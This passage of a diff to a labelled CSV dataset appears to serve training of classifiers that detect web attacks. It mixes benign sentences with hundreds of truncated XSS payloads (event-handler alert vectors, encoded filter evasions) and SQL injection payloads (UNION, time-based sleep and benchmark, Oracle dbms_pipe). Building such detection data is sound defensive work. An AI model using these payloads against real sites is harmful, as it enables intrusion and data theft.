oncut=""alert(1)"" contenteditable>test</no",1,XSS,6055 -Delete the expired subscriptions.,0,normal,22740 -"<strong onkeydown=""alert(1)"" contenteditable>test<",1,XSS,4226 --3581'|| ( select 'uxmh' from dual where 8954 = 89,2,SQLi,18935 -How did you select the poetry and writing for it?,0,normal,26081 -"On the iPhone 214 order page, select the model you",0,normal,25842 -<li id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,6769 -<h1 id=x tabindex=1 onfocus=alert(1)></h1>,1,XSS,3200 -"If Trump wins, he will select Yellen's successor i",0,normal,26052 -<style>:target {color: red;}</style><s id=x style=,1,XSS,6450 -"<button onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,7952 -1'|| ( select 'jpow' from dual where 4381 = 4381 a,2,SQLi,14627 -"{""id"":null,""firstName"":""Koh"",""lastName"":""Yun Jia"",",0,normal,27242 -1'|| ( select 'ozoj' where 1608 = 1608,2,SQLi,15805 -"1"" ) ) ) or 2633 = dbms_pipe.receive_message ( chr",2,SQLi,19029 -<style>:target {color: red;}</style><center id=x s,1,XSS,4436 -"OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000",2,SQLi,11358 -Select bar.,0,normal,24540 -"1"" ) ) as uzvu where 2458 = 2458 or ( select 9173 ",2,SQLi,13669 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,14646 -"1 where 7240 = 7240 or 6979 = like ( 'abcdefg',upp",2,SQLi,15707 -1'|| ( select 'xyrk' from dual where 9844 = 9844 a,2,SQLi,18446 -<button onpointerdown=alert(1)>XSS</button>,1,XSS,3776 -1' and 5556 = ( select count ( * ) from all_users ,2,SQLi,20383 -1 ) ) as uadn where 9588 = 9588 rlike sleep ( 5 ) ,2,SQLi,16375 -<map id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,5597 -"Discussions on set subjects were held, select pass",0,normal,26237 -"<script>with(document.getElementById(""d""))innerHTM",1,XSS,9298 -"For the Apple News app, editors select stories fro",0,normal,26172 -"<noembed onmouseup=""alert(1)"">test</noembed>",1,XSS,4175 -1' ) ) as ovbz where 3203 = 3203 ( select ( case w,2,SQLi,22270 -"<meta ondblclick=""alert(1)"">test</meta>",1,XSS,8738 -"<input name=""secret"" type=""password"">",1,XSS,9217 -1' ) ) ) or 7417 = ( select count ( * ) from sysib,2,SQLi,21378 -"1"" ) ) ( select ( case when ( 5451 = 5451 ) then r",2,SQLi,15582 -(select top 1,2,SQLi,10144 -"Elizabeth Street Ventures, Maywic Select Investmen",0,normal,26215 -"<kbd onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,8544 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,16056 +"-8060"" ) where 5290 = 5290 or 5903 = ( 'qqpjq'|| (",2,SQLi,15427 +The nominees that a President Hillary Clinton woul,0,normal,25405 +After Republicans won control of the House in the ,0,normal,26401 +1'|| ( select 'ctgs' where 6809 = 6809 or 6979 = l,2,SQLi,22271 +"1234 "" AND 1 = 0 UNION ALL SELECT ""admin"", ""81dc9b",2,SQLi,11464 +"<del draggable=""true"" ondrag=""alert(1)"">test</del>",1,XSS,7468 +"<script onmousemove=""alert(1)"">test</script>",1,XSS,1869 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,21200 +( select ( case when ( 1938 = 1938 ) then dbms_pip,2,SQLi,18955 +<rp onpointerup=alert(1)>XSS</rp>,1,XSS,2523 +"-9150%' ) ) ) union all select 7057,7057,7057,7057",2,SQLi,22459 +<figure id=x tabindex=1 ondeactivate=alert(1)></fi,1,XSS,1822 +"<element onpaste=""alert(1)"" contenteditable>test</",1,XSS,2412 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8246 +"<dt oncopy=""alert(1)"" contenteditable>test</dt>",1,XSS,6640 +"1 ) where 4810 = 4810 union all select null,null#",2,SQLi,16579 +"<multicol onmousemove=""alert(1)"">test</multicol>",1,XSS,4568 +1' ) ) as kdwc where 5906 = 5906 union all select ,2,SQLi,14920 +"-9439"" ) where 9460 = 9460 or ( 9497 = 9586 ) *958",2,SQLi,13932 +"Y., Senate Select Committee on Intelligence Chairm",0,normal,25108 +"<blink onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,6394 +<noframes onpointerleave=alert(1)>XSS</noframes>,1,XSS,2120 +"union (select NULL, NULL, NULL, NULL, NULL, (selec",2,SQLi,10053 +"<q onmouseout=""alert(1)"">test</q>",1,XSS,3782 +Save up to 20% off select Greenworks 80V Outdoor P,0,normal,25727 +<table id=x tabindex=1 ondeactivate=alert(1)></tab,1,XSS,4964 +"<style>@keyframes x{}</style><samp style=""animatio",1,XSS,2811 +"<a href=""\x17javascript:javascript:alert(1)"" id=""f",1,XSS,499 +"select * from users where id = 1 or 1#""; union sel",2,SQLi,11448 +><img src=x onerror=window.open('https://www.googl,1,XSS,919 +1%' and 3715 in ( ( char ( 113 ) +char ( 113 ) +ch,2,SQLi,13393 +-2869' ) ) union all select 3216--,2,SQLi,13267 +"<samp oncontextmenu=""alert(1)"">test</samp>",1,XSS,4287 +Delete the files.,0,normal,22833 +<script>Object.prototype.documentMode = 9 </script,1,XSS,229 +Select verify.,0,normal,24567 +1'|| ( select 'bgdh' from dual where 1967 = 1967,2,SQLi,22365 +<area id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,2743 +select sleep ( 5 ) and ( ( 'keoy' = 'keoy,2,SQLi,13332 +select * from users where id = 1.*1 or 1 = 1 -- 1,2,SQLi,11706 +1' or 9643 = ( select count ( * ) from domain.doma,2,SQLi,14351 +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+X,1,XSS,9274 +1'+ ( select 'jkgf' where 7487 = 7487,2,SQLi,22042 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11116 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6004 +"<header onpaste=""alert(1)"" contenteditable>test</h",1,XSS,4900 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5586 +( select * from ( select ( sleep ( 5 ) ) ) acdk ) ,2,SQLi,18752 +"<samp draggable=""true"" ondrag=""alert(1)"">test</sam",1,XSS,7870 +"-3817"" ) as vugz where 3064 = 3064 or 9323 = 9323#",2,SQLi,21092 +#ERROR!,1,XSS,1130 +-4979' ) ) or 4493 = utl_inaddr.get_host_address (,2,SQLi,22260 +&&SLEEP(5)&&'1,2,SQLi,10403 +perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\,1,XSS,1569 +ORDER BY 28#,2,SQLi,10301 +%22%3e%3cscript%3ealert('XSS')%3c/script%3e,1,XSS,1708 +<h1 onpointermove=alert(1)>XSS</h1>,1,XSS,3156 +or pg_sleep(5)--,2,SQLi,10367 +"select * from users where id = 1 or "" ( {"" or 1 = ",2,SQLi,11526 +"<canvas onmouseenter=""alert(1)"">test</canvas>",1,XSS,7302 +Where's your SQL expertise?,0,normal,23370 +"{""id"":null,""firstName"":""Haziq"",""lastName"":""Subari""",0,normal,27079 +"<h1 onkeyup=""alert(1)"" contenteditable>test</h1>",1,XSS,6243 +"onmouseover=""document.cookie=true;"">//INJECTX",1,XSS,9827 +<dir onpointerenter=alert(1)>XSS</dir>,1,XSS,2927 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10493 +"{""id"":null,""firstName"":""Jonas"",""lastName"":""Lee"",""a",0,normal,27276 +"-3513%"" union all select 8473,8473#",2,SQLi,12447 +"<embed draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,2723 +<style>:target {color:red;}</style><optgroup id=x ,1,XSS,7512 +Select a program to watch online.,0,normal,24198 +"1 ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,21919 +She'll select her bouquet.,0,normal,24361 +1' ) ) as iuta where 1482 = 1482,2,SQLi,13802 +"-3628"" or 1570 = convert ( int, ( select char ( 11",2,SQLi,15157 +Where's the best pizza place?,0,normal,23493 +1 ) ) as goar where 2405 = 2405 and 5927 = 9731--,2,SQLi,14786 +"end and ( ( ( ""%"" = """,2,SQLi,16347 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10835 +1' ) as pxcd where 9754 = 9754 or sleep ( 5 ) --,2,SQLi,15752 +<SCRIPT>a=/XSS/,1,XSS,9056 +<style>@im\port'\ja\vasc\ript:document.vulnerable=,1,XSS,1507 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6057 +Update your email signature.,0,normal,22737 +<fieldset id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,4228 +"1"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""xjdh""",2,SQLi,18937 +How to watch it: Booksmart is playing in select th,0,normal,26078 +"On the other hand, if local elections are held on ",0,normal,25839 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6771 +<figure onpointerout=alert(1)>XSS</figure>,1,XSS,3202 +"If you decide you want matching napkins, select th",0,normal,26049 +<marquee onpointerup=alert(1)>XSS</marquee>,1,XSS,6452 +"<style>@keyframes x{}</style><tr style=""animation-",1,XSS,7954 +1'+ ( select iwbs where 4939 = 4939,2,SQLi,14629 +"{""id"":null,""name"":""Leopard Seal""}",0,normal,27240 +"1' ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,15807 +1%' ) or 1022 = ( select count ( * ) from all_user,2,SQLi,19031 +<svg><i onload=alert(1)></i>,1,XSS,4438 +"OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000",2,SQLi,11360 +"1"" rlike sleep ( 5 ) and ""rylv"" like ""rylv",2,SQLi,21451 +"1 union all select null,null,null,null,null,null#",2,SQLi,13671 +"1"" ) ) as daqd where 4390 = 4390 and elt ( 3114 = ",2,SQLi,14648 +"1"" ) ) ) and ( 7758 = 4628 ) *4628 and ( ( ( ""wzas",2,SQLi,15709 +1' where 1652 = 1652 and sleep ( 5 ) #,2,SQLi,18448 +"<style>@keyframes x{}</style><time style=""animatio",1,XSS,3778 +"1%"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 10",2,SQLi,20385 +"-3433' ) where 8307 = 8307 union all select 8307,8",2,SQLi,16377 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5599 +Does the House Permanent Select Committee on Intel,0,normal,26234 +<script>x=document.createElement(%22iframe%22);x.s,1,XSS,9300 +For those interested in gaining exposure to these ,0,normal,26169 +<template id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,4177 +1' ) as mara where 7164 = 7164,2,SQLi,22268 +"<audio draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,8740 +"<input type=""submit"">",1,XSS,9219 +"-2718"" ) or 4747 = dbms_utility.sqlid_to_sqlhash (",2,SQLi,21376 +"1,iif ( 6625 = 6625,1,1/0 )",2,SQLi,15584 +a' or 3=3--,2,SQLi,10146 +ET. Call Me By Your Name is now in select theaters,0,normal,26212 +"<code onmouseenter=""alert(1)"">test</code>",1,XSS,8546 "&lt;LINK REL=\""stylesheet\"" HREF=\""http&#58;//ha&#",1,XSS,984 -<style id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,8034 -<tr onpointerover=alert(1)>XSS</tr>,1,XSS,5481 -"-4541"" ) ) or make_set ( 4821 = 5233,5233 ) and ( ",2,SQLi,14895 -"-5617 ) where 2132 = 2132 union all select 2132,21",2,SQLi,20047 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10487 -"<progress onkeydown=""alert(1)"" contenteditable>tes",1,XSS,4658 -"<dialog draggable=""true"" ondragend=""alert(1)"">test",1,XSS,6415 -"1"" ) or 8466 = benchmark ( 5000000,md5 ( 0x694a474",2,SQLi,15387 -<img id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,3151 -"{""id"":null,""name"":""Maractus""}",0,normal,27309 -1'+ ( select kgon where 9014 = 9014 ( select ( cas,2,SQLi,21340 -"1%"" and 8514 = ( select count ( * ) from domain.do",2,SQLi,15862 -"<script> function foo(elem, doc, text) { elem.oncl",1,XSS,9266 -"<u draggable=""true"" ondragleave=""alert(1)"">test</u",1,XSS,5970 -1' ) ) ) and 6969 = ( select 6969 from pg_sleep ( ,2,SQLi,14999 -"select * from users where id = 1 union select 1 $,",2,SQLi,11892 -"1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71",2,SQLi,19324 -1' ) or 7427 = dbms_pipe.receive_message ( chr ( 1,2,SQLi,15455 -1 ) where 9010 = 9010 and 8514 = ( select count ( ,2,SQLi,17725 -"{""id"":null,""firstName"":""Robib"",""lastName"":""Thyng"",",0,normal,26893 -&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;,1,XSS,1392 -1' ) ) and ( 3020 = 3020 ) *6703 and ( ( 'vvkd' li,2,SQLi,22238 -<optgroup id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,7438 -"-2211"" or 2113 = 8885#",2,SQLi,21741 -"<font onmouseout=""alert(1)"">test</font>",1,XSS,8803 -Where's the massage parlor?,0,normal,23619 +<dialog id=x tabindex=1 onfocus=alert(1)></dialog>,1,XSS,8036 +<shadow id=x tabindex=1 onfocus=alert(1)></shadow>,1,XSS,5483 +"1"" ) ) or 8421 = ( select count ( * ) from generat",2,SQLi,14897 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20049 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10489 +<style>:target {color:red;}</style><data id=x styl,1,XSS,4660 +"<del onmouseout=""alert(1)"">test</del>",1,XSS,6417 +"-6766"" where 6591 = 6591 or make_set ( 9354 = 9354",2,SQLi,15389 +"<keygen onkeyup=""alert(1)"" contenteditable>test</k",1,XSS,3153 +"1"" ) union all select null--",2,SQLi,21917 +Delete the old photos.,0,normal,22682 +if ( 8574 = 7534 ) select 8574 else drop function ,2,SQLi,15864 +<script> document.getElementById(%22safe123%22).se,1,XSS,9268 +<image id=x tabindex=1 onactivate=alert(1)></image,1,XSS,5972 +1 ) as odqn where 3910 = 3910,2,SQLi,15001 +"select * from users where id = 1 or 1#"" ( union se",2,SQLi,11894 +1 where 3744 = 3744,2,SQLi,19326 +1' where 3339 = 3339 and 3824 = benchmark ( 500000,2,SQLi,15457 +"-6254%' ) ) ) or 1 group by concat ( 0x7171706a71,",2,SQLi,17727 +"{""id"":null,""name"":""Uxie""}",0,normal,26890 +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE,1,XSS,1393 +1 ) and 3707 = ( select count ( * ) from sysibm.sy,2,SQLi,22236 +"<canvas oncut=""alert(1)"" contenteditable>test</can",1,XSS,7440 +"Scroll down to the ""Capture screenshot"" option and",0,normal,25697 +"<tt draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,8805 +Where's the tattoo parlor?,0,normal,23616 "<body onMouseEnter body onMouseEnter=""javascript:j",1,XSS,372 -"<bgsound onpaste=""alert(1)"" contenteditable>test</",1,XSS,6147 -1' or 9643 = ( select count ( * ) from domain.doma,2,SQLi,22225 -><script+src=https://googleads.g.doubleclick.net/p,1,XSS,9776 -1' ) ) and 6510 = ( select count ( * ) from sysuse,2,SQLi,17797 -"1' ) procedure analyse ( extractvalue ( 9255,conca",2,SQLi,21111 -1 ) ) ) order by 1#,2,SQLi,18641 -Where did you learn about that ancient artifact fr,0,normal,23815 -"<datalist onmousedown=""alert(1)"">test</datalist>",1,XSS,2213 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5604 -"<aside onkeyup=""alert(1)"" contenteditable>test</as",1,XSS,8882 -<isindex id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,5418 -"<u onkeypress=""alert(1)"" contenteditable>test</u>",1,XSS,4939 -"-8429' ) ) ) or make_set ( 9354 = 9354,7185 ) and ",2,SQLi,13435 --8923'+ ( select xgvz where 9858 = 9858 union all ,2,SQLi,20009 -<font id=x tabindex=1 ondeactivate=alert(1)></font,1,XSS,3159 -"1 union all select null,null,null,null,null,null,n",2,SQLi,20652 -"<div id=""99"">XXX<style>",1,XSS,9159 +"<datalist draggable=""true"" ondragenter=""alert(1)"">",1,XSS,6149 +1' and 2006 = 2006,2,SQLi,22223 +><script+src=https://cse.google.com/api/0076270247,1,XSS,9778 +1 ) as ewnv where 3393 = 3393 and 2716 = ( select ,2,SQLi,17799 +1' ) and ( 2763 = 4004 ) *4004 and ( 'dtts' = 'dtt,2,SQLi,21109 +select ( case when ( 4006 = 1276 ) then 1 else 400,2,SQLi,18643 +I need to decide where to go for a hike.,0,normal,23812 +<table id=x tabindex=1 onfocus=alert(1)></table>,1,XSS,2214 +<svg><content onload=alert(1)></content>,1,XSS,5606 +"<META HTTP-EQUIV=""Link"" Content=""<http://.rocks/.c",1,XSS,8884 +"<sup onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,5420 +"<figure oncut=""alert(1)"" contenteditable>test</fig",1,XSS,4941 +"1%"" and 6240 = ( 'qqpjq'|| ( select case 6240 when",2,SQLi,13437 +"1 where 8389 = 8389 union all select null,null,nul",2,SQLi,20011 +"<body draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,3161 +1 ) as duqb where 6495 = 6495,2,SQLi,20654 +"<div id=d><x xmlns=""><iframe onload=alert(97)""></d",1,XSS,9161 "ABC<div style=""x:expression\x00(javascript:alert(1",1,XSS,464 -"1"" rlike ( select ( case when ( 7689 = 7689 ) then",2,SQLi,18139 -"1' and ( select 9067 from ( select count ( * ) ,co",2,SQLi,21706 +"1"" and 4595 = 4595#",2,SQLi,18141 +"1"" ) ) ) and ( select 9067 from ( select count ( *",2,SQLi,21704 <script>javascript:alert(1)<\x00/script>,1,XSS,616 -"<ol onmousedown=""alert(1)"">test</ol>",1,XSS,6381 -1%' ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( ,2,SQLi,20214 -"-2625' ) or elt ( 1032 = 1032,3623 ) and ( 'eliy' ",2,SQLi,16763 -"AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1",2,SQLi,11299 -"1"" ) as kbjt where 2012 = 2012 and ( 5978 = 6898 )",2,SQLi,12996 -<button onpointermove=alert(1)>XSS</button>,1,XSS,8182 -"1"" ) or 7427 = dbms_pipe.receive_message ( chr ( 1",2,SQLi,17720 -"1"" or ( select 2* ( if ( ( select * from ( select ",2,SQLi,13512 -"1%"" ) ) or row ( 1045,7562 ) > ( select count ( * ",2,SQLi,16575 -"<em onkeypress=""alert(1)"" contenteditable>test</em",1,XSS,2717 -Where's the waterfall?,0,normal,23521 -Create a lasting memory.,0,normal,22600 -There are two voting rounds to select a new French,0,normal,25333 -1'+ ( select 'zxxh' where 4065 = 4065 and 8635 = (,2,SQLi,20182 -Select your route.,0,normal,24832 -or 1=1 or ''=',2,SQLi,10004 -select case when 8227 = 1229 then 1 else null end-,2,SQLi,13640 --8436' ) as frmf where 7225 = 7225 or make_set ( 9,2,SQLi,21707 -"<kbd onmouseout=""alert(1)"">test</kbd>",1,XSS,7390 --5258 ) or ( 8459 = 8459 ) *4906,2,SQLi,18279 -"end and ""mdje"" like ""mdje",2,SQLi,14357 -Select your dream career.,0,normal,24326 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7770 -"<del onmouseover=""alert(1)"">test</del>",1,XSS,6222 -Where's the botanical garden?,0,normal,23591 -The Utilities Select Sector SPDR (XLU) and Real Es,0,normal,25361 -<style>:target {color:red;}</style><fieldset id=x ,1,XSS,7038 --8828 ) ) as ospo where 2141 = 2141 or 4493 = utl_,2,SQLi,15475 -or '1' = '1,2,SQLi,11647 -"1"" ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( (",2,SQLi,15898 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9--",2,SQLi,10571 -1'+ ( select 'otqy' where 2754 = 2754 or updatexml,2,SQLi,15512 --6145 or ( 8459 = 8459 ) *4906-- yklv,2,SQLi,20965 -1'+ ( select 'uetb' where 6468 = 6468,2,SQLi,21069 -Get select bakeware for up to 20% off this weekend,0,normal,26143 -<dl onpointerout=alert(1)>XSS</dl>,1,XSS,6359 -Where did you find that fantastic recipe?,0,normal,23893 -"1%"" ) ) ) and char ( 107 ) ||char ( 121 ) ||char (",2,SQLi,20377 -<area onpointerup=alert(1)>XSS</area>,1,XSS,6692 -Select your preferred flavor.,0,normal,24268 -"1"" or 5286 = ( select count ( * ) from all_users t",2,SQLi,15882 -"&lt;?import namespace=\""t\"" implementation=\""#defa",1,XSS,1031 -<div style=content:url(test2.svg)></div>,1,XSS,9165 -"1' ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( 'k",2,SQLi,18605 ->-->*/</noscript></ti tle><script>alert()</script>,1,XSS,9489 -";;alert(String.fromCharCode(88,83,83))//\';;alert(",1,XSS,1578 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,15860 -"AND 1=0 UNION ALL SELECT "", 81dc9bdb52d04dc20036db",2,SQLi,9948 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3794 -Where's the psychotherapist?,0,normal,23664 -1' ( select ( case when ( 4587 = 4587 ) then regex,2,SQLi,20712 -1' ) as xrap where 5523 = 5523 rlike ( select * fr,2,SQLi,17552 -Select your fall.,0,normal,25018 -"<bdo onmouseout=""alert(1)"">test</bdo>",1,XSS,2918 -<progress id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,5587 --2429%' or 6890 = 5846,2,SQLi,14606 -"<output onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,6327 -Where did you spot that unique sculpture from?,0,normal,23702 -<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080,1,XSS,1516 -"-9629' ) ) ) union all select 3077,3077,3077,3077#",2,SQLi,20697 -"<frameset onbeforecopy=""alert(1)"" contenteditable>",1,XSS,2372 -"<img onpaste=""alert(1)"" contenteditable>test</img>",1,XSS,3433 --9340 ) where 5462 = 5462 or 3038 = 3038,2,SQLi,18648 -1'|| ( select 'zoqo' from dual where 2063 = 2063,2,SQLi,20864 -"<tr ondblclick=""alert(1)"">test</tr>",1,XSS,4240 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,19774 -&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.,1,XSS,1391 +"<bdi onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,6383 +-8028%' ) ) ) or 5042 = 5214,2,SQLi,20216 +"1"" ) where 2278 = 2278",2,SQLi,16765 +")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND",2,SQLi,11301 +1 ) or ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,12998 +"<SPAN DATASRC=""#"" DATAFLD=""B"" DATAFORMATAS=""HTML"">",1,XSS,8184 +"1"" where 4652 = 4652 and 3202 = like ( 'abcdefg',u",2,SQLi,17722 +"-5379' ) union all select 4294,4294,4294--",2,SQLi,13514 +1' ) and 4380 = 5851 and ( 'cxcl' = 'cxcl,2,SQLi,16577 +"<button onkeyup=""alert(1)"" contenteditable>test</b",1,XSS,2718 +1 ) where 5234 = 5234 or 8514 = benchmark ( 500000,2,SQLi,22160 +Merge the company data.,0,normal,22597 +There is simply no point in dividing the spoils am,0,normal,25330 +"1' ) where 5276 = 5276 union all select null,null-",2,SQLi,20184 +1' ) ) as ovbz where 3203 = 3203 ( select ( case w,2,SQLi,22270 +or 'a'='a,2,SQLi,10006 +"-1949"" ) ) as urke where 8761 = 8761 union all sel",2,SQLi,13642 +"1' union all select null,null--",2,SQLi,21705 +"<style>@keyframes slidein {}</style><xmp style=""an",1,XSS,7392 +"-2876"" ) or make_set ( 5306 = 6127,6127 ) and ( ""u",2,SQLi,18281 +-9225 ) or ( 8258 = 2726 ) *2726 and ( 9900 = 9900,2,SQLi,14359 +Please select a date.,0,normal,24323 +"<table onmouseleave=""alert(1)"">test</table>",1,XSS,7772 +"<p onkeyup=""alert(1)"" contenteditable>test</p>",1,XSS,6224 +Where's the parade?,0,normal,23588 +The View Mother wavelet option can be used to sele,0,normal,25358 +"<base onkeypress=""alert(1)"" contenteditable>test</",1,XSS,7040 +1'+ ( select 'mdxt' where 2733 = 2733 or 4240 = ( ,2,SQLi,15477 +) ) or ( ( 'x' ) ) = ( ( 'x,2,SQLi,11649 +"1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171",2,SQLi,15900 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--",2,SQLi,10573 +"1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71",2,SQLi,15514 +Select your study.,0,normal,24991 +"1 ) union all select null,null,null,null,null,null",2,SQLi,21067 +1 and sleep ( 5 ) #,2,SQLi,21204 +"<style>@keyframes x{}</style><bdo style=""animation",1,XSS,6361 +He ordered a meal from his favorite restaurant.,0,normal,23890 +1' ) as syer where 3141 = 3141 rlike ( select ( ca,2,SQLi,20379 +"<caption ondblclick=""alert(1)"">test</caption>",1,XSS,6694 +"Additionally, the adjustable roller hinges allow y",0,normal,26405 +1%' ) ) ) and ( select 9067 from ( select count ( ,2,SQLi,15884 +"&lt;t&#58;set attributeName=\""innerHTML\"" to=\""XSS",1,XSS,1032 +"<embed src=""http://corkami.googlecode.com/svn/!svn",1,XSS,9167 +"-4230"" ) ) ) union all select 6962,6962,6962,6962,",2,SQLi,18607 +jaVas%0Cript:/*--></tit%0le></st%0yle></text%0area,1,XSS,9491 +";';;!--"";<;XSS>;=&;{()}",1,XSS,1579 +"1%"" and 8514 = ( select count ( * ) from domain.do",2,SQLi,15862 +and 1=1–,2,SQLi,9950 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3796 +Where's the counseling appointment?,0,normal,23661 +1 ) as iuje where 1976 = 1976 and 6537 = dbms_pipe,2,SQLi,20714 +"1"" ) ) as jmoy where 9676 = 9676 and char ( 120 ) ",2,SQLi,17554 +Select your conquer.,0,normal,25015 +<isindex onpointerleave=alert(1)>XSS</isindex>,1,XSS,2919 +"<i onpaste=""alert(1)"" contenteditable>test</i>",1,XSS,5589 +-4761 order by 1--,2,SQLi,14608 +"<select draggable=""true"" ondragend=""alert(1)"">test",1,XSS,6329 +Our lumber purchasers visit the sawmills several t,0,normal,25799 +"<XML ID=I><X><C><![<IMG SRC=""javas]]<![cript:docum",1,XSS,1517 +-5369' ) or 3208 = 6669#,2,SQLi,20699 +<form onpointerout=alert(1)>XSS</form>,1,XSS,2373 +"<dl onmouseup=""alert(1)"">test</dl>",1,XSS,3435 +-6405 ) as ilah where 5145 = 5145 union all select,2,SQLi,18650 +"1"" where 9342 = 9342 and 6240 = ( 'qqpjq'|| ( sele",2,SQLi,20866 +<a onfocusout=alert(1) tabindex=1 id=x></a><input ,1,XSS,4242 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,19776 +&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;,1,XSS,1392 <svg><script ?>alert(1),1,XSS,894 -"-5294%"" ) or 4144 = ( select upper ( xmltype ( chr",2,SQLi,17875 -You can select.,0,normal,24798 -1' ) ) as pqbq where 1865 = 1865,2,SQLi,14038 -1' ) as hqaq where 6411 = 6411 and 8594 = ( select,2,SQLi,22218 -"1"" ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 1",2,SQLi,15188 -<noembed id=x tabindex=1 ondeactivate=alert(1)></n,1,XSS,2934 -Opposition on petition could be heard before a sel,0,normal,25808 -""")) waitfor delay '0:0:20' --",2,SQLi,10938 -"{""id"":null,""firstName"":""勤生"",""lastName""",0,normal,27475 -Congratulations to our very own @JulienMid and the,0,normal,26506 -#ERROR!,1,XSS,1130 +"1, ( select * from generate_series ( 9108,9108,cas",2,SQLi,17877 +Let's select toppings.,0,normal,24795 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,14040 +1%' and 6537 = dbms_pipe.receive_message ( chr ( 7,2,SQLi,22216 +1%' ) rlike ( select * from ( select ( sleep ( 5 ),2,SQLi,15190 +<embed src=1 onerror=alert(1) type=image/gif>,1,XSS,2935 +Or when you see today a long economic expansion an,0,normal,25805 +"""))) waitfor delay '0:0:20' --",2,SQLi,10940 +The service is going to select popular and recent ,0,normal,25378 +du nd his parents have no guts to serve us one the,0,normal,26503 +%2BADw-script+AD4-alert(document.location)%2BADw-/,1,XSS,1131 <script>javascript:alert(1)</script>,1,XSS,732 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11111 -"<hgroup onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,3085 -<title onpointerout=alert(1)>XSS</title>,1,XSS,7298 -<header onfocusout=alert(1) tabindex=1 id=x></head,1,XSS,4589 -"-9384%"" union all select 7031,7031,7031,7031,7031,",2,SQLi,12497 -<plaintext id=x tabindex=1 onfocus=alert(1)></plai,1,XSS,2796 -"<IMG SRC=""`<javascript:alert>`('')""",1,XSS,7602 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11113 +<blink onblur=alert(1) tabindex=1 id=x></blink><in,1,XSS,3086 +<bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><,1,XSS,7300 +<html id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,4591 +"-8491"" where 6107 = 6107 or 4493 = utl_inaddr.get_",2,SQLi,12499 +"<option onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,2797 +"<command onmousedown=""alert(1)"">test</command>",1,XSS,7604 ";!--""<XSS>=&{()}",1,XSS,799 -"1%"" ) waitfor delay '0:0:5'--",2,SQLi,17119 -1 ( select ( case when ( 5451 = 5451 ) then regexp,2,SQLi,21168 --3422%' ) or 5903 = ( 'qqpjq'|| ( select case 5903,2,SQLi,18629 +"-6971"" or 4747 = dbms_utility.sqlid_to_sqlhash ( (",2,SQLi,17121 +select case when 1802 = 7063 